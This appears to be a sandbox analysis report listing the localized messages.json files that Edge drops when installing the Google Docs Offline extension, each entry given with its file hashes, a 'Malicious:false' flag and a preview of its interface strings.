                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                    MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                    SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                    SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                    SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                    MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                    SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                    SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                    SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                    MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                    SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                    SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                    SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                    MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                    SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                    SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                    SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                    MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                    SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                    SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                    SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                    MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                    SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                    SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                    SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                    MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                    SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                    SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                    SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                    Malicious:false
